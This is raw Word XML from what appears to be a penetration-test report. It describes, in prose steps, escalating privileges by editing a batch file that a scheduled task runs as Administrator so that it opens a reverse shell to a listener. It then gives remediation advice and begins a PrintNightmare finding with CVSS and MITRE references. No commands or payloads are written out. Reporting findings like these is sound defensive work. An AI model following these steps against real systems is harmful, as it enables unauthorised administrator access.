          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Administrator access to the system.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="74776A42" w14:textId="22BCB2B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3560F85" w:rsidP="0D325B6E" w:rsidRDefault="13560F85" w14:paraId="33EC8AFC" w14:textId="45BA880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3560F85" w:rsidP="0D325B6E" w:rsidRDefault="13560F85" w14:paraId="33935675" w14:textId="31F8D763">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:after="0" w:afterAutospacing="off"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:strike w:val="0"/>
          <w:dstrike w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="1155CC"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:u w:val="none"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="13560F85">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74289CAB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Locate</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="74289CAB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> the file in the files of the </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="74289CAB">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74289CA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4289CAB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>user</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="13560F85" w:rsidP="0D325B6E" w:rsidRDefault="13560F85" w14:paraId="68BD4662" w14:textId="4588DE35">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0462FBE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>View permissions of the file to see that it is run as Administrator</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="13560F85" w:rsidP="0D325B6E" w:rsidRDefault="13560F85" w14:paraId="1425EADF" w14:textId="27D2CF0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7C4F72F6">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7C4F72F6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> the batch file to run a reverse shell when executed</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="13560F85" w:rsidP="0D325B6E" w:rsidRDefault="13560F85" w14:paraId="064D7F11" w14:textId="6A745C1C">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0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 4: </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="2C543F6B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Create a listener and wait for a connection when the scheduled task runs.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="245D3AC4" w14:textId="4B1F677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3560F85" w:rsidP="0D325B6E" w:rsidRDefault="13560F85" w14:paraId="7C98A509" w14:textId="4812AA3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3560F85" w:rsidP="0D325B6E" w:rsidRDefault="13560F85" w14:paraId="476938C0" w14:textId="4599F0D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560F8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3560F8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621C2B39">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621C2B39" w:rsidP="0D325B6E" w:rsidRDefault="621C2B39" w14:paraId="5FA58B6C" w14:textId="79EBD4A2">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="43"/>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621C2B39">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34A78575">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">ll scheduled tasks that must be run as Administrator </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="4583650B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">should </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="34A78575">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">only be editable by the Administrator account. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="34A78575" w:rsidP="0D325B6E" w:rsidRDefault="34A78575" w14:paraId="3D0CBE50" w14:textId="16AD96AE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="43"/>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4A78575">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">If a scheduled task does not need administrative </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="5B2ECCBE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>privileges</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="34A78575">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> to run, it</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="0CF95212">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> should not have admin </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="37A748F9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>privileges</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="0CF95212">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> to follow the Principle of Least </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="69AB6739">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0CF95212">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6C02B716">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>preven</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="0CF95212">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">t </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="0ADEC20B">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0CF95212">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> escalation attempts. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="1F839889" w:rsidP="0D325B6E" w:rsidRDefault="1F839889" w14:paraId="3A674476" w14:textId="20B14DAF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="43"/>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F839889">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Centralize scheduled task management via Group Policy to allow for deployment and tracking of scheduled tasks centrally.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="08D337E9" w14:textId="085C744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798D723C" w:rsidP="0D325B6E" w:rsidRDefault="798D723C" w14:paraId="51DBD707" w14:textId="4BBEDD6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8D723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D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="232D1BF6" w14:textId="0C34D89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6F243E50" w14:textId="66985D24">
      <w:pPr>
        <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:strike w:val="0"/>
          <w:dstrike w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="1155CC"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:u w:val="none"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="423FF356" w14:textId="40871250">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="1B60FD21" w14:textId="6CC97E6F">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="07675DC8" w:rsidP="0D325B6E" w:rsidRDefault="07675DC8" w14:paraId="22A48AAA" w14:textId="305154BE">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345764432" w:id="90257943"/>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="07675DC8">
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:color w:val="FF0000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>▌</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="07675DC8">
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:color w:val="0F4761" w:themeColor="accent1" w:themeTint="FF" w:themeShade="BF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>H1:</w:t>
      </w:r>
      <w:bookmarkStart w:name="_Toc349373098" w:id="1589199215"/>
      <w:bookmarkStart w:name="_Toc1484112193" w:id="406494090"/>
      <w:bookmarkStart w:name="_Toc1827584314" w:id="1111371314"/>
      <w:bookmarkStart w:name="_Toc210215" w:id="1199720680"/>
      <w:bookmarkStart w:name="_Toc793767734" w:id="1022882387"/>
      <w:bookmarkStart w:name="_Toc1786869480" w:id="802276951"/>
      <w:bookmarkStart w:name="_Toc601844430" w:id="742800337"/>
      <w:bookmarkStart w:name="_Toc1319893757" w:id="918892425"/>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="2FF159C4">
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="2FF159C4">
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>PrintNightmare</w:t>
      </w:r>
      <w:bookmarkEnd w:id="802276951"/>
      <w:bookmarkEnd w:id="742800337"/>
      <w:bookmarkEnd w:id="918892425"/>
      <w:bookmarkEnd w:id="1589199215"/>
      <w:bookmarkEnd w:id="406494090"/>
      <w:bookmarkEnd w:id="1111371314"/>
      <w:bookmarkEnd w:id="1199720680"/>
      <w:bookmarkEnd w:id="1022882387"/>
      <w:bookmarkEnd w:id="9025794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6DDB654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E38CE85" w14:textId="7389E68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1211185" w14:textId="0FD0E08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3CBE1B3" w14:textId="61B3E69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F824DB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957D38" w14:textId="3A4D9BE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565694C" w14:textId="0290D48A">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2426FAC" w14:textId="71D2FCF1">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61269AC0">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:color w:val="FFFFFF" w:themeColor="background1" w:themeTint="FF" w:themeShade="FF"/>
                <w:sz w:val="60"/>
                <w:szCs w:val="60"/>
              </w:rPr>
              <w:t>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C0B864E" w14:textId="39759B77">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118EB33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5027F1" w14:textId="37F6930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F97790B" w:rsidP="0D325B6E" w:rsidRDefault="6F97790B" w14:paraId="6A058A6B" w14:textId="161B070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6F97790B">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6485121"/>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288E01D"/>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0D325B6E" w:rsidTr="0D325B6E" w14:paraId="11A5C4D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636123" w14:textId="772D459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B62EE0C" w:rsidP="0D325B6E" w:rsidRDefault="3B62EE0C" w14:paraId="7D1CFF5A" w14:textId="04E215D2">
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:caps w:val="0"/>
                <w:smallCaps w:val="0"/>
                <w:strike w:val="0"/>
                <w:dstrike w:val="0"/>
                <w:noProof w:val="0"/>
                <w:color w:val="0070C0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:u w:val="none"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink w:anchor="CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" r:id="R9b7f794501134890">
              <w:r w:rsidRPr="0D325B6E" w:rsidR="3B62EE0C">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:caps w:val="0"/>
                  <w:smallCaps w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>AV:L/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0D325B6E" w:rsidTr="0D325B6E" w14:paraId="2891CCC3">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C7DB50" w14:textId="7B69671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BFA3C41" w:rsidP="0D325B6E" w:rsidRDefault="7BFA3C41" w14:paraId="5A2EEABD" w14:textId="43FECCB0">
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:bidi w:val="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidR="7BFA3C41">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DECB37" w:rsidP="0D325B6E" w:rsidRDefault="00DECB37" w14:paraId="7EC9CDA9" w14:textId="3BCA1AB5">
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:strike w:val="0"/>
                <w:dstrike w:val="0"/>
                <w:noProof w:val="0"/>
                <w:color w:val="0070C0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:u w:val="none"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="R0fcaecd3ef2d475a">
              <w:r w:rsidRPr="0D325B6E" w:rsidR="00DECB37">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>T1608</w:t>
              </w:r>
              <w:r w:rsidRPr="0D325B6E" w:rsidR="5F42FA14">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>:</w:t>
              </w:r>
              <w:r w:rsidRPr="0D325B6E" w:rsidR="00DECB37">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t xml:space="preserve"> Exploitation for Privilege Escalation</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0D325B6E" w:rsidTr="0D325B6E" w14:paraId="021AA9E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5FE417A"/>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16E17B2" w:rsidP="0D325B6E" w:rsidRDefault="716E17B2" w14:paraId="61859B77" w14:textId="336F37B0">
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:bidi w:val="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidR="716E17B2">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970C61F" w:rsidP="0D325B6E" w:rsidRDefault="4970C61F" w14:paraId="43614395" w14:textId="659E7CF7">
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:bidi w:val="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:color w:val="0070C0"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="R46303a2d239841f6">
              <w:r w:rsidRPr="0D325B6E" w:rsidR="4970C61F">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>M1051: Update Software</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0D325B6E" w:rsidTr="0D325B6E" w14:paraId="09AC02B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2586BC" w14:textId="0353C7CC">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7126D49" w14:textId="12E95691">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74F0B7A" w14:textId="254660B9">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="2FF159C4" w:rsidP="0D325B6E" w:rsidRDefault="2FF159C4" w14:paraId="73F8F604" w14:textId="4AC5D48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097FB5F" w:rsidP="0D325B6E" w:rsidRDefault="3097FB5F" w14:paraId="444C0B2E" w14:textId="7B4E8D3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097FB5F">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0D325B6E" w:rsidR="3097FB5F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> is vulnerable to t</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="4D4D74A8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
